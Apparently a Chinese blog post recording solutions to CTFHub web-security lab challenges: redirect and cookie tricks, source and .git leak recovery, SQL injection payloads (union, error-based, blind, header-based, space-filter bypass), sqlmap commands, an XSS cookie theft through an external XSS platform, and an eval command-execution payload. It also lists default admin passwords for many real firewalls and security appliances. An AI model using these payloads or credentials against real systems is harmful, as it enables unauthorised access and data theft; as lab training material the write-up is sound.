<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="2js56,2js56666@gmail.com"><title>CTFHUB刷题记录 · 2js56's blog</title><meta name="description" content="CTFHUB刷题记录WEBweb前置技能HTTP协议请求方式bp抓包，更改请求方式

302跳转
考察http临时重定向
（HTTP重定向：服务器无法处理浏览器发送过来的请求（request），服务器告诉浏览器跳转到可以处理请求的url上。浏览器会自动访问该URL地址，以至于用户无法分辨是否重定向了"><meta name="keywords" content="Hexo,HTML,CSS,web,Linux"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><meta name="generator" content="Hexo 6.3.0"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">2js56's blog</a></h3><div class="description"><p>love 林海青</p></div></div></div><ul class="social-links"><li><a target="_blank" rel="noopener" href="http://github.com/2js56"><i class="fa fa-github"></i></a></li></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a target="_blank" rel="noopener" href="https://www.caicai.me"> CaiCai </a><span>&</span><a target="_blank" rel="noopener" href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">Home</a></li><li><a href="/about">Sobre</a></li><li><a href="/archives">Archivo</a></li><li><a href="/links">Enlaces</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div><div class="avatar"><img src="/images/touxiang.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>CTFHUB刷题记录</a></h3></div><div class="post-content"><h1 id="CTFHUB刷题记录"><a href="#CTFHUB刷题记录" class="headerlink" title="CTFHUB刷题记录"></a>CTFHUB刷题记录</h1><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="web前置技能"><a href="#web前置技能" class="headerlink" title="web前置技能"></a>web前置技能</h3><h4 id="HTTP协议"><a href="#HTTP协议" class="headerlink" title="HTTP协议"></a>HTTP协议</h4><h5 id="请求方式"><a href="#请求方式" class="headerlink" title="请求方式"></a>请求方式</h5><p>bp抓包，更改请求方式</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224210142665.png" alt="image-20211224210142665"></p>
<h5 id="302跳转"><a href="#302跳转" class="headerlink" title="302跳转"></a>302跳转</h5><ul>
<li><p>考察http临时重定向</p>
<p>（HTTP重定向：服务器无法处理浏览器发送过来的请求（request），服务器告诉浏览器跳转到可以处理请求的url上。浏览器会自动访问该URL地址，以至于用户无法分辨是否重定向了。）</p>
</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224205803488.png" alt="image-20211224205803488"></p>
<p>f12打开网络界面，点击链接，</p>
<p>右键<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224205907204.png" alt="image-20211224205907204"></p>
<p>在cmd中执行得到flag</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224205942007.png" alt="image-20211224205942007"></p>
<ul>
<li><p>其中我们需要知道HTTP中的重定向和请求转发的区别</p>
<p>##转发是服务器行为，重定向是客户端行为。为什么这样说呢，这就要看两个动作的工作流程：##</p>
<p>转发过程：客户浏览器发送http请求——&gt;web服务器接受此请求——&gt;调用内部的一个方法在容器内部完成请求处理和转发动作—&gt;将目标资源发送给客户；</p>
<p>在这里，转发的路径必须是同一个web容器下的url，其不能转向到其他的web路径上去，中间传递的是自己的容器内的request。在客户浏览器路径栏显示的仍然是其第一次访问的路径，也就是说客户是感觉不到服务器做了转发的。转发行为是浏览器只做了一次访问请求。</p>
<p>重定向过程：客户浏览器发送http请求——&gt;web服务器接受后发送302状态码响应及对应新的location给客户浏览器——&gt;客户浏览器发现是302响应，则自动再发送一个新的http请求，请求url是新的location地址——&gt;服务器根据此请求寻找资源并发送给客户。</p>
<p>在这里location可以重定向到任意URL，既然是浏览器重新发出了请求，则就没有什么request传递的概念了。在客户浏览器路径栏显示的是其重定向的路径，客户可以观察到地址的变化的。重定向行为是浏览器做了至少两次的访问请求的。</p>
<p>重定向，其实是两次request</p>
<p>第一次，客户端request A,服务器响应，并response回来，告诉浏览器，你应该去B。这个时候IE可以看到地址变了，而且历史的回退按钮也亮了。重定向可以访问自己web应用以外的资源。在重定向的过程中，传输的信息会被丢失。</p>
</li>
</ul>
<h5 id="Cookie"><a href="#Cookie" class="headerlink" title="Cookie"></a>Cookie</h5><p>因为题目说只有admin才能得到flag，通过查看cookie，得知admin的值为0，则通过抓包将admin的值改为1，得到flag</p>
<p>  <img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224211228344.png" alt="image-20211224211228344"></p>
<h5 id="基础认证"><a href="#基础认证" class="headerlink" title="基础认证"></a>基础认证</h5><p>相关文章：<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/64584734">https://zhuanlan.zhihu.com/p/64584734</a></p>
<p>通过题目所给的字典进行爆破，找出长度不同的包，得到flag</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224221055480.png" alt="image-20211224221055480"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224221036581.png" alt="image-20211224221036581"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224221141465.png" alt="image-20211224221141465"></p>
<h5 id="响应包源代码"><a href="#响应包源代码" class="headerlink" title="响应包源代码"></a>响应包源代码</h5><p>查看页面源代码得到flag</p>
<p><img src="C:%5CUsers%5Clenovo%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20211224221602619.png" alt="image-20211224221602619"></p>
<h4 id="信息泄露"><a href="#信息泄露" class="headerlink" title="信息泄露"></a>信息泄露</h4><h5 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h5><p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224221851647.png" alt="image-20211224221851647"></p>
<p>查看flag.txt得到flag</p>
<h5 id="PHPINFO"><a href="#PHPINFO" class="headerlink" title="PHPINFO"></a>PHPINFO</h5><p>查看phpinfo</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224222236946.png" alt="image-20211224222236946"></p>
<p>找到flag</p>
<h5 id="备份文件下载"><a href="#备份文件下载" class="headerlink" title="备份文件下载"></a>备份文件下载</h5><h6 id="网站源码"><a href="#网站源码" class="headerlink" title="网站源码"></a>网站源码</h6><p>通过访问<a target="_blank" rel="noopener" href="http://www.zip下载得到flag_3128822888.txt,打开却是where/">www.zip下载得到flag_3128822888.txt，打开却是where</a> is flag？</p>
<p>在url上访问该目录，得到flag：</p>
<p>ctfhub{56ddcc138d819e15e1a42dba}</p>
<h6 id="bak文件"><a href="#bak文件" class="headerlink" title="bak文件"></a>bak文件</h6><p>访问index.php.bak下载文件打开得到flag</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20211224225338656.png" alt="image-20211224225338656"></p>
<h6 id="vim缓存"><a href="#vim缓存" class="headerlink" title="vim缓存"></a>vim缓存</h6><p>拿到这道题开始很懵逼，通过查阅资料得知，vim在编辑文档的过程中如果异常退出，会产生缓存文件，产生的缓存文件后缀为.swp访问index.php.swp,发现404,原来是因为</p>
<p>.swp是隐藏文件，这类文件的调用前面都需要加一个. ，于是执行命令vim -r index.php.swp，结果在我的windows下使用执行不了vim，应该是需要安装，索性用kali执行，得到flag。</p>
<h6 id="DS-Store"><a href="#DS-Store" class="headerlink" title=".DS_Store"></a>.DS_Store</h6><p>同理，url后面添加.DS_Store，将文件下载下来，cat一下得到flag</p>
<h5 id="git泄露"><a href="#git泄露" class="headerlink" title="git泄露"></a>git泄露</h5><h6 id="log"><a href="#log" class="headerlink" title="log"></a>log</h6><p>dirsearch扫描发现<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111162419886.png" alt="image-20220111162419886"></p>
<p>使用githack <code>python GitHack.py http://challenge-7f4c7b9df98a43f3.sandbox.ctfhub.com:10800/.git </code><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111162944095.png" alt="image-20220111162944095"></p>
<p>将目录的源代码弄到本地，进入dist的该目录，执行git log</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111163351770.png" alt="image-20220111163351770"></p>
<p>执行对比命令<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111163543896.png" alt="image-20220111163543896"></p>
<p>得到flag</p>
<h6 id="stash"><a href="#stash" class="headerlink" title="stash"></a>stash</h6><p>dirsearch执行<code>python3 dirsearch.py -u url</code>扫描得到<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111170954174.png" alt="image-20220111170954174"></p>
<p>githark<code>python GitHack.py http://challenge-78d21b3ec9ad4a98.sandbox.ctfhub.com:10800/.git</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111171139892.png" alt="image-20220111171139892"></p>
<p>接下来<code>git stash list</code></p>
<p>发现存在stash文件，于是<code>git stash pop</code>得到<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111171642285.png" alt="image-20220111171642285"></p>
<p>发现flag<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111171707524.png" alt="image-20220111171707524"></p>
<h6 id="index"><a href="#index" class="headerlink" title="index"></a>index</h6><p>与上同理，用dirsearch和githack处理后，在文件夹中得到flag<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111172517053.png" alt="image-20220111172517053"></p>
<h5 id="SVN泄露"><a href="#SVN泄露" class="headerlink" title="SVN泄露"></a>SVN泄露</h5><p>由于工具的原因，没有成功做出来，不过这题不算难，就不写wp了</p>
<h5 id="HG泄露"><a href="#HG泄露" class="headerlink" title="HG泄露"></a>HG泄露</h5><p>这题要同样要用到dvcs-ripper，所以不继续做了</p>
<h4 id="密码口令"><a href="#密码口令" class="headerlink" title="密码口令"></a>密码口令</h4><h5 id="弱口令"><a href="#弱口令" class="headerlink" title="弱口令"></a>弱口令</h5><p>一个弱口令爆破，没啥难度，带入字典爆破就行了，不过我的bp是社区版的，单线程爆破太慢，这里我就不做了</p>
<h5 id="默认口令"><a href="#默认口令" class="headerlink" title="默认口令"></a>默认口令</h5><p>默认口令直接上网查找<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/20200828103417162.png" alt="img"></p>
<p>下面是一些常见的网络安全设备默认密码</p>
<figure class="highlight plaintext"><figcaption><span>默认账号	  默认密码</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br></pre></td><td class="code"><pre><span class="line">深信服产品	sangfor	sangfor</span><br><span class="line">sangfor@2018</span><br><span class="line">sangfor@2019</span><br><span class="line">深信服科技 AD		dlanrecover</span><br><span class="line">深信服负载均衡 AD 3.6	admin	admin</span><br><span class="line">深信服WAC ( WNS V2.6)	admin	admin</span><br><span class="line">深信服VPN	Admin	Admin</span><br><span class="line">深信服ipsec-VPN (SSL 5.5)	Admin	Admin</span><br><span class="line">深信服AC6.0	admin	admin</span><br><span class="line">SANGFOR防火墙	admin	sangfor</span><br><span class="line">深信服AF(NGAF V2.2)	admin	sangfor</span><br><span class="line">深信服NGAF下一代应用防火墙(NGAF V4.3)	admin	admin</span><br><span class="line">深信服AD3.9	admin	admin</span><br><span class="line">深信服上网行为管理设备数据中心	Admin	密码为空</span><br><span class="line">SANGFOR_AD_v5.1	admin	admin</span><br><span class="line">网御漏洞扫描系统	leadsec	leadsec</span><br><span class="line">天阗入侵检测与管理系统 V7.0	</span><br><span class="line">Admin	venus70</span><br><span class="line">Audit	venus70</span><br><span class="line">adm	venus70</span><br><span class="line">天阗入侵检测与管理系统 V6.0	</span><br><span class="line">Admin	venus60</span><br><span class="line">Audit	venus60</span><br><span class="line">adm	venus60</span><br><span class="line">网御WAF集中控制中心(V3.0R5.0)	</span><br><span class="line">admin	leadsec.waf</span><br><span class="line">audit	leadsec.waf</span><br><span class="line">adm	leadsec.waf</span><br><span class="line">联想网御	administrator	administrator</span><br><span class="line">网御事件服务器	admin	admin123</span><br><span class="line">联想网御防火墙PowerV	administrator	administrator</span><br><span class="line">联想网御入侵检测系统	lenovo	default</span><br><span class="line">网络卫士入侵检测系统	admin	talent</span><br><span class="line">网御入侵检测系统V3.2.72.0	</span><br><span class="line">adm	leadsec32</span><br><span class="line">admin	leadsec32</span><br><span class="line">联想网御入侵检测系统IDS	</span><br><span class="line">root	111111</span><br><span class="line">admin	admin123</span><br><span class="line">科来网络回溯分析系统	csadmin	colasoft</span><br><span class="line">中控考勤机web3.0	administrator	123456</span><br><span class="line">H3C iMC	admin	admin</span><br><span class="line">H3C SecPath系列	admin	admin</span><br><span class="line">H3C S5120-SI	test	123</span><br><span class="line">H3C智能管理中心	</span><br><span class="line">admin	admin</span><br><span class="line">H3C ER3100	admin	adminer3100</span><br><span class="line">H3C ER3200	admin	adminer3200</span><br><span class="line">H3C ER3260	admin	adminer3260</span><br><span class="line">H3C	admin	adminer</span><br><span class="line">admin	admin</span><br><span class="line">admin	h3capadmin</span><br><span class="line">h3c	h3c</span><br><span class="line">360天擎	admin	admin</span><br><span class="line">网神防火墙	firewall	firewall</span><br><span class="line">天融信防火墙NGFW4000	superman	talent</span><br><span class="line">黑盾防火墙	admin	admin</span><br><span class="line">rule	abc123</span><br><span class="line">audit	abc123</span><br><span class="line">华为防火墙	telnetuser	telnetpwd</span><br><span class="line">ftpuser	ftppwd</span><br><span class="line">方正防火墙	admin	admin</span><br><span class="line">飞塔防火墙	admin	密码为空</span><br><span class="line">Juniper_SSG__5防火墙	netscreen	netscreen</span><br><span class="line">中新金盾硬件防火墙	admin	123</span><br><span class="line">kill防火墙(冠群金辰)	admin	sys123</span><br><span class="line">天清汉马USG防火墙	</span><br><span class="line">admin	venus.fw</span><br><span class="line">Audit	venus.audit</span><br><span class="line">useradmin	venus.user</span><br><span class="line">阿姆瑞特防火墙	admin	manager</span><br><span class="line">山石网科	hillstone	hillstone</span><br><span class="line">绿盟安全审计系统	</span><br><span class="line">weboper	weboper</span><br><span class="line">webaudit	webaudit</span><br><span class="line">conadmin	conadmin</span><br><span class="line">admin	admin</span><br><span class="line">shell	shell</span><br><span class="line">绿盟产品		nsfocus123</span><br><span class="line">TopAudit日志审计系统	superman	talent</span><br><span class="line">LogBase日志管理综合审计系统	admin	safetybase</span><br><span class="line">网神SecFox运维安全管理与审计系统	admin	!1fw@2soc#3vpn</span><br><span class="line">天融信数据库审计系统	superman	telent</span><br><span class="line">Hillstone安全审计平台	hillstone	hillstone</span><br><span class="line">网康日志中心	ns25000	ns25000</span><br><span class="line">网络安全审计系统（中科新业）	admin	123456</span><br><span class="line">天玥网络安全审计系统	Admin	cyberaudit</span><br><span class="line">明御WEB应用防火墙	admin	admin</span><br><span class="line">admin	adminadmin</span><br><span class="line">明御攻防实验室平台	root	123456</span><br><span class="line">明御安全网关	admin	adminadmin</span><br><span class="line">明御运维审计与册风险控制系统	</span><br><span class="line">admin	1q2w3e</span><br><span class="line">system	1q2w3e4r</span><br><span class="line">auditor	1q2w3e4r</span><br><span class="line">operator	1q2w3e4r</span><br><span class="line">明御网站卫士	</span><br><span class="line">sysmanager	sysmanager888</span><br><span class="line">亿邮邮件网关	</span><br><span class="line">eyouuser	eyou_admin</span><br><span class="line">eyougw	admin@(eyou)</span><br><span class="line">admin	+-ccccc</span><br><span class="line">admin	cyouadmin</span><br><span class="line">Websense邮件安全网关	administrator	admin</span><br><span class="line">梭子鱼邮件存储网关	admin	admin</span><br></pre></td></tr></table></figure>

<h4 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h4><p>SQL注入类型大多只要运用好sqlmap都是能够跑出来的，不过我们学习过程中还是用手注好一些，不过sqlmap的基本操作也需要掌握</p>
<h5 id="整数型注入"><a href="#整数型注入" class="headerlink" title="整数型注入"></a>整数型注入</h5><p>当输入1 order by 1及1 order by 2时都能得到正常回显，当改为1 order by 3时不能得到正常回显，说明列数为2，则使用1 union select 1,2，发现正常回显，将其改为，</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111185058128.png" alt="image-20220111185058128"></p>
<p>发现data的值变成了2，所以可以通过改变2的语句来进行注入，</p>
<p>-1 union select 1,database()，得到<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111185330281.png" alt="image-20220111185330281"></p>
<p>说明有用，继续，直接查看所以库名</p>
<p>-1 union select 1,group_concat(schema_name)from information_schema.schemata</p>
<p>这里的group_concat()用于连接这些库名的字符串，而information_schema.schemata，这个里面存放的则是所有数据库名，</p>
<p>如果存在长度限制，那么可以通过</p>
<p>select schema_name from information_schema.schemata limit 0,1逐条获取，接下来</p>
<p>-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema&#x3D;’sqli’得到<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220111190134101.png" alt="image-20220111190134101"></p>
<p>直接查flag表-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema&#x3D;’sqli’ and table_name&#x3D;’flag’</p>
<p>继续查flag字段-1 union select 1,group_concat(flag) from sqli.flag</p>
<p>得到flag</p>
<h5 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h5><p>这里为字符型注入，所以需要注释将后面的引号注释掉</p>
<p>可以用–+或者#进行注释，后面的操作和整数型输入没啥区别了，</p>
<p>同样是先判断列数，由于是同一个数据库，所以这些东西应该都没变，直接套用修改一下就可拿到flag</p>
<p><code>&#39; union select 1,group_concat(flag) from sqli.flag#</code></p>
<p>这里我用–+没有成功，不过用– （这里有个空格）成功了。之前记得是–+，原来是因为+在url里面编码为空格，所以注释应该是#或者–（这里有空格）</p>
<h5 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h5><p>之前极客大挑战也有一个报错注入的题</p>
<p>直接<code> 1 Union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;</code></p>
<p>同样，继续查表，</p>
<p><code>1 Union select count(*),concat((select table_name from information_schema.tables where table_schema=&#39;sqli&#39; limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220117120611546.png" alt="image-20220117120611546"></p>
<p>后面操作也同样只用改改payload就行了，由于数据库一样，我直接查了flag<code>1 Union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220117120741010.png" alt="image-20220117120741010"></p>
<h5 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h5><p>由于页面只返回两个结果，对或错，那么这就只能通过一个个对比ascii码来进行注入，由于知道数据库为sqli，所以首先试试<code>1 and (length(database()))=4</code>，然后试试<code>1 and ascii(substr(database(),1,1))=115</code></p>
<p>如果不知道数据库名的话，可以通过二分法来折半查找，就是工作量有点大就是了，可以写脚本来操作，不过我不太会，所以知道原理了，直接拿sqlmap跑了。</p>
<p><code>python sqlmap.py -u http://challenge-d76cdeeff06f3afb.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220117151927946.png" alt="image-20220117151927946"></p>
<h5 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h5><p>时间盲注就不得不用到sleep()这个函数，于是输入<code>if(substr(database(),1,1)=&#39;s&#39;,sleep(3),1)</code></p>
<p>发现页面有一定时间的等待，所以语句成立。</p>
<p>同样如果一个一个注入太费时间了，清楚原理了就行，这里直接上脚本<code>python sqlmap.py  -u http://challenge-46e81b950a7df771.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119135226706.png" alt="image-20220119135226706"></p>
<h5 id="MYSQL结构"><a href="#MYSQL结构" class="headerlink" title="MYSQL结构"></a>MYSQL结构</h5><p>这道题我不知道考察什么，就常规的语句1 order by 2试了一下，然后也是常规的注入，不过这次我直接用插flag的语句没有成功，所以还是得一步一步来，先数据库-1 union select database(),2</p>
<p>接着<code>-1 union select 1,group_concat(table_name) from  information_schema.tables where table_schema=&#39;sqli&#39;</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119141214928.png" alt="image-20220119141214928"></p>
<p>继续<code>-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=&#39;hjrhulnume&#39;</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119141320300.png" alt="image-20220119141320300"></p>
<p><code>-1 union select 1,group_concat(kvuzromifm) from hjrhulnume</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119141426492.png" alt="image-20220119141426492"></p>
<h5 id="Cookie注入"><a href="#Cookie注入" class="headerlink" title="Cookie注入"></a>Cookie注入</h5><p>抓包修改cookie进行注入</p>
<p><code>id=-1 union select database(),version();</code></p>
<p><code>-1 union select 1,group_concat(table_name) from  information_schema.tables where table_schema=&#39;sqli&#39;</code></p>
<p>   <code>-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=&#39;ddoavgqppz&#39;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1 union select 1,group_concat(ntlchzrftc) from ddoavgqppz</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119150421549.png" alt="image-20220119150421549"></p>
<h5 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h5><p>由于这道题将空格过滤了，于是用&#x2F;**&#x2F;注释符号来代替空格的作用，</p>
<p><code>-1/**/union/**/select/**/database(),2</code></p>
<p><code>-1/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema=&#39;sqli&#39;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-1/**/union/**/select/**/group_concat(column_name),2/**/from/**/information_schema.columns/**/where/**/table_name=&#x27;lzsgmohfpc&#x27;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1/**/union/**/select/**/ckeyngfhux,2/**/from/**/lzsgmohfpc</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119151848701.png" alt="image-20220119151848701"></p>
<h5 id="UA注入"><a href="#UA注入" class="headerlink" title="UA注入"></a>UA注入</h5><p>和cookie注入类似，这次注入点在User-Agent里</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119152724059.png" alt="image-20220119152724059"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119152735004.png" alt="image-20220119152735004"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119153320260.png" alt="image-20220119153320260"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119153339075.png" alt="image-20220119153339075"></p>
<p>接下来都是重复的操作了</p>
<p>查字段查flag</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119153511323.png" alt="image-20220119153511323"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119153520001.png" alt="image-20220119153520001"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119153609629.png" alt="image-20220119153609629"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119153616284.png" alt="image-20220119153616284"></p>
<h5 id="Referer注入"><a href="#Referer注入" class="headerlink" title="Referer注入"></a>Referer注入</h5><p>同样，在抓到的包里面添加一个Referer:进行注入</p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119154529374.png" alt="image-20220119154529374"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119154535618.png" alt="image-20220119154535618"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119154621899.png" alt="image-20220119154621899"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119154630565.png" alt="image-20220119154630565"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119154840561.png" alt="image-20220119154840561"></p>
<p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119154849519.png" alt="image-20220119154849519"></p>
<h4 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h4><p><img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119160407473.png" alt="image-20220119160407473"></p>
<p>能够通过输入的东西改变页面，于是<code>&lt;script&gt;alert(1)&lt;/script&gt;</code></p>
<p>得到了弹窗，于是在xss platform（<a target="_blank" rel="noopener" href="http://xsscom.com//index.php?do=login">xsscom.com</a>）上面创建一个项目，得到这个<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119160654130.png" alt="image-20220119160654130"></p>
<p>在第一个框中提交</p>
<p>接着将提交后的url放入第二个框中<img src="https://cdn.jsdelivr.net/gh/2js56/PictureBed@master/images/image-20220119160825146.png" alt="image-20220119160825146"></p>
<p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20220119160834235.png" alt="image-20220119160834235"></p>
<p>再在平台上面查看，成功在cookie中得到flag</p>
<h1 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h1><h2 id="eval执行"><a href="#eval执行" class="headerlink" title="eval执行"></a>eval执行</h2><p>给cmd赋一个值，直接执行一个系统命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=system(&#x27;ls ../../../&#x27;);</span><br></pre></td></tr></table></figure>

